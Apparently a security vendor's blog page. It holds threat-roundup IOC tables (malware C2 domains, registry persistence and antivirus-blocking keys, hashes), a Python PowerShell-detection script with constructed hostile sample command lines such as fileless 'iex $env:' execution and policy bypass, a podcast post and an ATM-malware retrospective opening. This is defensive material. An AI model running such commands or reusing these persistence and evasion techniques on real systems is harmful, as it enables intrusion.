  • 68f24fc9a20111bb749e1374fa1fcb832ca55f08f716561376c4aa7cc5cb60e4
  • 6a67901c8232e4e4d9cbab3b161cd56a9c36596e92a0ad019537613f1c542ba5
  • 6cb59a8f51d309a1b780e82c9f6e54274fdd10237dfb118fe75ce7c6d29941ec
  • 7076e385d4b26ebaeff99786a8a5d76fedf122881d1ff29965993ee9f48bf584
  • 730b4fade238d5afe3f535227dc729d4caf438312d6635cf65a6344ceb3888ee
  • 74377fe4f81e47cb43780794543e5949342bb96adfb698aa80f9451a24e64b3b
  • 7bbdad89f5b9aebe8c62048cbbc4b3f9521101ba9b25e100a3baeb24dfb1a499
  • 7eed9a6117a9efce8a2717a695d9ccb697b0bcbd6cc85a01d530140070711945
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

Win.Dropper.Swisyn-6973984-0


Indicators of Compromise


Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: WINCHAT) | 11
Mutexes | Occurrences
N/A | -
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
210[.]241[.]123[.]205 | 5
61[.]60[.]12[.]164 | 5
64[.]76[.]147[.]89 | 5
190[.]85[.]16[.]13 | 4
187[.]45[.]228[.]58 | 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
economic[.]3cnet[.]tw | 4
larry[.]yumiya[.]com | 1
Files and or directories created | Occurrences
%APPDATA%\Help | 11
ka4281x3.log | 11
\TEMP\ka4281x3.log | 11
%TEMP%\kb71271.log | 11
%TEMP%\~$$workp.doc | 11
%TEMP%\~$workp.doc | 11
%APPDATA%\Help\WINCHAT.EXE | 11
\ka4281x3.log | 10
\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | 2
%TEMP%\CVRE02.tmp | 1
%TEMP%\CVRFEB.tmp | 1
%TEMP%\CVR6C7.tmp | 1
%TEMP%\CVR725.tmp | 1
%TEMP%\CVRC82.tmp | 1
File Hashes
  • 007ca03c6d3185983f7628ce283087dca0d5bed03ec912200d1e921672303209
  • 1baf10a1266410e3d9ea5010a86493f7a7c5cc8025fa1960e0fc3473827aaa23
  • 3a6dd31a0a1382f74b13a1d1d4906c570302f858ac0c8c101865b3b6c7d448f8
  • 53219b02a2c4231a996f9eebc53fd0a822e123efd47317789331822c02b3e3ab
  • 56a652a5242989a2dfdc91a588180e939120a0b749e4cfb45b65a01399957143
  • 602dc673518f70c3b55b8c0092435c40cdcec1725af015eae7a3ed869530c5cc
  • 6b50e3860285f021a508a13dcd80c1325560ccdefbed642db3f607d3187ddebb
  • 7722f295fa1cf7a3b5cda45aea62c1d4e7269bb964848a5cb6fe3098902b361d
  • a3683189e55067e50a65d37af97d8273ccacc87336ac4b7a2023032431f0cac2
  • a6991f1e575a92024a7dab7ab5e16f2c64a5caf59054ab326cb648ebdb7b1537
  • bc38eda2656f510bbeaf4dc14f25e97f249f5b3dc8327999ad44d2b4b98bd090

Coverage


Screenshots of Detection

AMP

ThreatGrid

Malware

Win.Malware.DarkComet-6973063-1


Indicators of Compromise


Registry Keys | Occurrences
<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | 14
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | 14
<HKCU>\SOFTWARE\CYBER (Value Name: NewGroup) | 7
<HKCU>\SOFTWARE\CYBER (Value Name: NewIdentification) | 7
<HKCU>\SOFTWARE\Cyber | 7
<HKCU>\SOFTWARE\CYBER (Value Name: FirstExecution) | 7
<HKLM>\Software\Wow6432Node\Microsoft\DownloadManager | 5
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Q448C2M3-FYKV-7ID0-27GB-B0YJ02KV7B37} | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MicrosoftPrint) | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MicrosoftPrint) | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{Q448C2M3-FYKV-7ID0-27GB-B0YJ02KV7B37} (Value Name: StubPath) | 2
<HKCU>\SOFTWARE\cgtestor | 2
<HKCU>\SOFTWARE\CGTESTOR (Value Name: NewIdentification) | 2
<HKCU>\SOFTWARE\CGTESTOR (Value Name: NewGroup) | 2
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A006786A-AF6Y-2H12-1ULT-6X56A8L375TN} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{H3T87034-72YI-HVWU-8TW1-XRLG3A51O2N1} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{XE2AOBQB-F345-88YC-GMXW-03PEJ75V7WN8} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{40UP52E3-1BA3-1FVA-0830-0LPA8BB74KCM} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{80MR36N0-3A0L-8U63-4ABE-DIG840AJ43R5} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y6OM0HT5-JGS2-L6NN-55A2-41O6554166B1} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{U24C12U8-JR64-860I-NR12-HX5Y3UL2O2GM} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5CJXRF76-BP1U-TPUE-6DCM-I034DALUNKB4} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{L24VWK2P-22R2-46K2-V8RJ-XK2H03J01HJL} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A8081X6Q-NN6X-B62A-4715-HN312RI8G7N5} | 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{7A1IWYJ7-F7XK-O3G5-N0V0-434M8W04DQ1K} | 1
Mutexes | Occurrences
\BaseNamedObjects\Administrator5 | 12
\BaseNamedObjects\Administrator1 | 12
\BaseNamedObjects\Administrator4 | 12
{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3} | 2
2V1AWS6YF6TXG2 | 2
2V1AWS6YF6TXG2_PERSIST | 2
2V1AWS6YF6TXG2_SAIR | 2
8KRK5M71VU1M5K | 1
8KRK5M71VU1M5K_PERSIST | 1
2V80730O046N4E | 1
2V80730O046N4E_PERSIST | 1
2V80730O046N4E_SAIR | 1
52736ID51F81S2 | 1
52736ID51F81S2_PERSIST | 1
21J3T4M0224831 | 1
21J3T4M0224831_PERSIST | 1
21J3T4M0224831_SAIR | 1
Global\a76de881-7963-11e9-a007-00501e3ae7b5 | 1
Global\a54a6c41-7963-11e9-a007-00501e3ae7b5 | 1
7IJA3Q405R67XA | 1
7IJA3Q405R67XA_PERSIST | 1
7IJA3Q405R67XA_SAIR | 1
BAND78GIQB66CP | 1
BAND78GIQB66CP_PERSIST | 1
BAND78GIQB66CP_SAIR | 1
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
52[.]8[.]126[.]80 | 3
162[.]125[.]8[.]6 | 2
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]server[.]com | 3
dl[.]dropbox[.]com | 2
amphetamin[.]dyndns[.]org | 2
bll3bll3[.]no-ip[.]biz | 2
chugychugy[.]no-ip[.]biz | 1
thecool[.]zapto[.]org | 1
danyeltdc[.]no-ip[.]biz | 1
cybergateratmortal[.]no-ip[.]biz | 1
mark1[.]dyndns[.]info | 1
NKG[.]NO-IP[.]BIZ | 1
tomate12345[.]zapto[.]org | 1
freecoolstuff[.]dyndns[.]org | 1
Files and or directories created | Occurrences
%TEMP%\Administrator2.txt | 15
%TEMP%\Administrator7 | 15
%TEMP%\Administrator8 | 15
%APPDATA%\Administratorlog.dat | 15
%TEMP% | 14
%SystemRoot%\SysWOW64\WinDir | 3
%SystemRoot%\SysWOW64\WinDir\Svchost.exe | 2
\directory | 2
\directory\CyberGate\install\server.exe | 2
\directory\CyberGate | 2
\directory\CyberGate\install | 2
%SystemRoot%\SysWOW64\Windefend | 2
%APPDATA%\Windefend | 2
%APPDATA%\Windefend\wdlc.exe | 2
%SystemRoot%\SysWOW64\Windefend\wdlc.exe | 2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\sqlite3[1].htm | 2
%SystemRoot%\SysWOW64\Java | 2
%SystemRoot%\SysWOW64\Java\Java.exe | 2
%SystemRoot%\svchost.exe | 1
%SystemRoot%\install\server.exe | 1
%SystemRoot%\SysWOW64\Svchost\Svchost.exe | 1
%TEMP%\fKbeeL8LAf7RNJz277.exe | 1
%TEMP%\wNXued4pQq1zObh0H1.exe | 1
%TEMP%\WqtgkF7HZR2P6A.exe | 1
%TEMP%\yORdpf8sEy7.exe | 1
See JSON for more IOCs
File Hashes
  • 042cc2f502cc7a8830f1422060bc7087218516dde6da1b82f13fce5dfb7fefc9
  • 09de6f1c248817500b6dd911e7cca1f662e4d4cc8f4ade8b9ede3af558553074
  • 15573121831d3e2c67bf219bbcd4e78c65e20d92f00bc16f2dbe564b02add7ce
  • 3041bd2d8b516685011bc96d42f6b0c5814790e51a7935a9b9a4f0e3d35b87f4
  • 33b215de55923f27998929217024c409e0b9059ae5f970aaeae6e8436185f615
  • 3708fb9505564ee292d27082f43ff080fe3545e5d9bdab204ac2b0e26825d4e9
  • 3a396d00735cb58475f7dfc44748a8b8b797157aa7c0ddbe73386434ad33382d
  • 98db7f273a141813f60c82b113635f0cbf0ec5e25ac58e518c629790a6536882
  • 9bffcee38ba555a0a522c3f18ac96fcb44b0a692007271fd239e8437756d379f
  • a192abef36bafcd1e7bad8620fc08a1618b285fcbec6a097521b0a99102d05c8
  • b64e1524cc098319cfd34d594e48b1ddad7690c9bb2e5a273e518fdf7b09ace2
  • c458867497286338031748ea86a7accb00bc03bd879cbcbf9102f5b4dcd9f360
  • f79c376b416bcfac45152f1b2a9809b12a1e7ee3afb50a0ccd4c1799b51735d3
  • fe712cd1343925500766a1bcff4c5221838998cf8dee475f0e84e9aa476a6583
  • fe9e3a928bdf85a0013f677b77acd177b7ae3a366cab7717a1871c537250b062

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Ursu-6977282-0


Indicators of Compromise


Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR (Value Name: Locked) | 23
<HKCU>\SOFTWARE\VB and VBA Program Settings | 23
<HKCU>\Software\VB and VBA Program Settings\Explorer\Process | 23
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\Explorer | 23
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\EXPLORER\PROCESS (Value Name: LO) | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Explorer) | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Svchost) | 23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED (Value Name: ShowSuperHidden) | 23
<HKLM>\SYSTEM\CurrentControlSet\Services\Schedule | 23
<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCHEDULE (Value Name: Start) | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: Start) | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Explorer) | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Svchost) | 23
Mutexes | Occurrences
N/A | -
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
N/A | -
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
N/A | -
Files and or directories created | Occurrences
%SystemRoot%\Resources\Themes\explorer.exe | 25
%SystemRoot%\Resources\spoolsv.exe | 25
%SystemRoot%\Resources\svchost.exe | 25
\atsvc | 23
%System32%\Tasks\svchost | 23
%SystemRoot%\Resources\Themes\tjcm.cmn | 23
%System32%\drivers\oreans32.sys | 23
%System32%\en-US\imageres.dll.mui | 2
%SystemRoot%\Globalization\Sorting\sortdefault.nls | 1
\??\NTICE | 1
File Hashes
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Zegost-6977492-1


Indicators of Compromise


Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: XXXXXX579E5A5B VVVVVVrr2unw==) | 24
Mutexes | Occurrences
AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw== | 24
\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw== | 9
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
107[.]165[.]236[.]233 | 24
45[.]39[.]189[.]31 | 24
154[.]90[.]68[.]52 | 24
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
www[.]af0575[.]com | 24
www[.]fz0575[.]com | 24
www[.]wk1888[.]com | 24
Files and/or directories created | Occurrences
%SystemRoot%\XXXXXX579E5A5B VVVVVVrr2unw== | 24
%SystemRoot%\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | 24
File Hashes
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Packed.Shipup-6973041-0


Indicators of Compromise


Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: LoadAppInit_DLLs) | 32
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: AppInit_DLLs) | 32
Mutexes | Occurrences
N/A | -
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
N/A | -
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
N/A | -
Files and/or directories created | Occurrences
%ProgramData%\Mozilla\thfirxd.exe | 32
%System32%\Tasks\aybbmte | 32
%ProgramData%\Mozilla\lygbwac.dll | 32
%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll | 31
%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe | 31
%SystemRoot%\Tasks\kylaxsk.job | 31
File Hashes
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Razy-6972250-0


Indicators of Compromise


Registry Keys | Occurrences
<HKCU>\Software\zzzsys | 29
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: EnableLinkedConnections) | 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: aroinics_svc) | 29
<HKCU>\SOFTWARE\ZZZSYS (Value Name: ID) | 29
<HKLM>\Software\Microsoft\DownloadManager | 2
<HKCU>\Software\DCAE84951C1ABA1 | 1
<HKCU>\SOFTWARE\DCAE84951C1ABA1 (Value Name: data) | 1
<HKCU>\Software\1CB360B14DD9DEE | 1
<HKCU>\SOFTWARE\1CB360B14DD9DEE (Value Name: data) | 1
<HKCU>\Software\4A8D80F87D78C75 | 1
<HKCU>\SOFTWARE\4A8D80F87D78C75 (Value Name: data) | 1
<HKCU>\Software\3C10A2EC8C6F11A3 | 1
<HKCU>\SOFTWARE\3C10A2EC8C6F11A3 (Value Name: data) | 1
<HKCU>\Software\B23F47051906EBA | 1
<HKCU>\SOFTWARE\B23F47051906EBA (Value Name: data) | 1
<HKCU>\Software\EDF09EC2BB87785A | 1
<HKCU>\SOFTWARE\EDF09EC2BB87785A (Value Name: data) | 1
<HKCU>\Software\43A7BE96FA393A15 | 1
<HKCU>\SOFTWARE\43A7BE96FA393A15 (Value Name: data) | 1
<HKCU>\Software\B26B751ACE1935 | 1
<HKCU>\SOFTWARE\B26B751ACE1935 (Value Name: data) | 1
<HKCU>\Software\2B359187F23A1A5 | 1
<HKCU>\SOFTWARE\2B359187F23A1A5 (Value Name: data) | 1
<HKCU>\Software\66655966ACCADC47 | 1
<HKCU>\SOFTWARE\66655966ACCADC47 (Value Name: data) | 1
Mutexes | Occurrences
\BaseNamedObjects\345432-123rvr4 | 29
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
Files and/or directories created | Occurrences
%HOMEPATH% | 29
File Hashes
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Malware.AutoIT-6974564-1


Indicators of Compromise


Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: Load) | 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgui.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgcsrvx.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgidsagent.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgrsx.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgwdsvc.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\egui.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\zlclient.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\bdagent.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\keyscrambler.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avp.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\wireshark.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\ComboFix.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MSASCui.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MpCmdRun.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\msseces.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MsMpEng.exe | 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVASTSVC.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCONFIG.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVASTUI.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVSCAN.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\INSTUP.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAM.EXE (Value Name: Debugger) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAMGUI.EXE (Value Name: Debugger) | 1
Mutexes | Occurrences
a6aa8a0b-6e56-4c3b-907b-050c9f3cd849 | 23
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
N/A | -
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
N/A | -
Files and/or directories created | Occurrences
%TEMP%\AppVShNotify | 23
%TEMP%\AppVShNotify\adsldpc.exe | 23
%TEMP%\tmp1.tmp | 19
File Hashes

Coverage


Screenshots of Detection

AMP

ThreatGrid

Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Madshi injection detected (3672)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • Kovter injection detected (2773)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • PowerShell file-less infection detected (1849)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (255)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (186)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Suspicious PowerShell execution detected (151)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
  • Excessively long PowerShell command detected (69)
    A PowerShell command with a very long command line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
  • Installcore adware detected (43)
    Installcore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Atom Bombing code injection technique detected (39)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Corebot malware detected (34)
    Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.
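The three PowerShell events above (a script launched from an environment variable, an execution-policy bypass, and an excessively long command line) can be approximated with command-line heuristics. The following is an added example, not Talos or AMP code: it runs over constructed command lines, assumes a 1000-character length threshold, and decodes -EncodedCommand payloads (base64 of UTF-16LE) so the environment-variable pattern is also caught when it is encoded.

```python
"""Command-line heuristics for the three PowerShell events listed above.

Added example, not Talos or AMP code. It works on process command lines as
an EDR or Sysmon feed would record them; the sample lines below are
constructed, and the length threshold is an assumption.
"""
import base64
import re
from typing import Dict, List, Optional

# Assumed threshold for "excessively long"; tune it to your own baseline.
LONG_COMMAND_THRESHOLD = 1000

_POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# -EncodedCommand and the abbreviations powershell.exe accepts for it.
_ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# -ExecutionPolicy Bypass/Unrestricted and its accepted abbreviations.
_EXEC_POLICY = re.compile(
    r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
# A $env: variable handed to Invoke-Expression: the Kovter/Poweliks pattern.
_ENV_TO_IEX = re.compile(
    r"(?:iex|invoke-expression)\s*\(?\s*\$env:\w+"
    r"|\$env:\w+\s*\|\s*(?:iex|invoke-expression)", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    match = _ENCODED.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> List[str]:
    """Return the sorted list of findings for one process command line."""
    if not _POWERSHELL.search(cmdline):
        return []
    # Inspect the decoded script as well, so encoding does not hide the pattern.
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    findings = set()
    if _ENV_TO_IEX.search(text):
        findings.add("powershell_fileless_env_var")
    if _EXEC_POLICY.search(text):
        findings.add("execution_policy_bypass")
    if len(cmdline) > LONG_COMMAND_THRESHOLD:
        findings.add("excessively_long_command")
    return sorted(findings)


# Constructed sample command lines (not captured from a real incident).
SAMPLE_COMMAND_LINES: Dict[str, str] = {
    "kovter_style": 'powershell.exe -nop -w hidden -c "iex $env:rzqkm"',
    "policy_bypass": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\upd.ps1",
    "long_encoded": "powershell.exe -w hidden -enc "
    + encode_command("Start-Sleep -Seconds 1; " * 60),
    "encoded_env": "powershell.exe -nop -enc " + encode_command("iex $env:kqz"),
    "benign": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "not_powershell": "cmd.exe /c dir %TEMP%",
}


def run_samples() -> Dict[str, List[str]]:
    """Analyze every sample; returns name -> findings."""
    return {name: analyze(line) for name, line in SAMPLE_COMMAND_LINES.items()}


if __name__ == "__main__":
    for name, findings in run_samples().items():
        print(f"{name:15} {findings or 'clean'}")
```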

Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days



Beers with Talos (BWT) Podcast Ep. #54 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 24, 2019 — There is another Blue(X) to talk about and guess what? YES, YOU STILL NEED TO PATCH. We talk about RDP, the source of this vulnerability and whether or not exploits exist for it (hint: they do). There is a quick look back at last year on the anniversary of VPNFilter, and we also tackle zero-days again through the lens of Project Zero’s timeline of zero-days found in the wild.

Also, Craig hasn’t seen the end of "John Wick 3" yet, so feel free to tweet him spoilers. If you are in San Diego for Cisco Live two weeks from now, come find us to see a live recording of the podcast!

The timeline:

  • 01:00 — Roundtable: The Dark Times, it’s not what you THOT, and deducing a new baby’s name
  • 13:00 — Happy birthday VPNFilter, I didn’t get you anything and I’m not sorry.
  • 18:00 — RDP and BlueKeep: Really Do Patch. Stop, go do it. Blah blah blah, not listening. Go patch.
  • 29:00 — Zero-days: The amount of time a patch has been available before any exploit, and/or since machines have made an attempt on Craig’s life.
  • 38:30 — Project Zero’s timeline of zero-days found in the wild
  • 47:30 — Parting shots, closing thoughts

Some other links:

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).

Hosted by Mitch Neff (@MitchNeff).

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

10 years of virtual dynamite: A high-level retrospective of ATM malware


Executive summary

It has been 10 years since the discovery of Skimer, the first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep, and analysis required specific knowledge of a manufacturer's ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers considered ATMs secure machines containing proprietary hardware, running non-standard operating systems, and implementing a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on some auxiliary devices, such as a safe and card reader.

